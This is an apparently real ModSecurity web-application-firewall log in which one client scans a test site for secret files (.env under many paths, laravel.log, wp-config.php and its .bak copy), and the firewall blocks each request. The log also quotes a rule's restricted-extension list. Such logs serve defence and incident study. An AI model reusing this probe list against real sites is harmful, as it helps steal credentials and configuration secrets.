[Thu Jan 01 09:26:32.870986 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.953437 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHGAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.953680 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHGAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.953863 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHGAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.040642 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHGQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.040900 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHGQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.041071 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHGQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.123425 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHGgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.123666 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHGgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.123827 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHGgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.206485 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHGwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.206734 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHGwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.206891 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHGwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.289525 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.289758 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.289941 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.372124 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.372347 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.372492 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.455016 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.455237 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.455401 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.537795 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.538026 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.538687 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHHwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.621021 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHIAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.621261 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHIAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.621410 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aVYvuSEFf7TT1LdjoKPHIAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.703784 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aVYvuSEFf7TT1LdjoKPHIQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.704149 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aVYvuSEFf7TT1LdjoKPHIQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.704298 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aVYvuSEFf7TT1LdjoKPHIQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.870679 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aVYvuSEFf7TT1LdjoKPHIwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.870923 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aVYvuSEFf7TT1LdjoKPHIwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:33.871091 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aVYvuSEFf7TT1LdjoKPHIwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.072902 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aVYvuv8XCgNe-1KotIuGpAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.073081 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aVYvuv8XCgNe-1KotIuGpAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:34.073308 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aVYvuv8XCgNe-1KotIuGpAAAAAI"], referer: https://www.google.com/
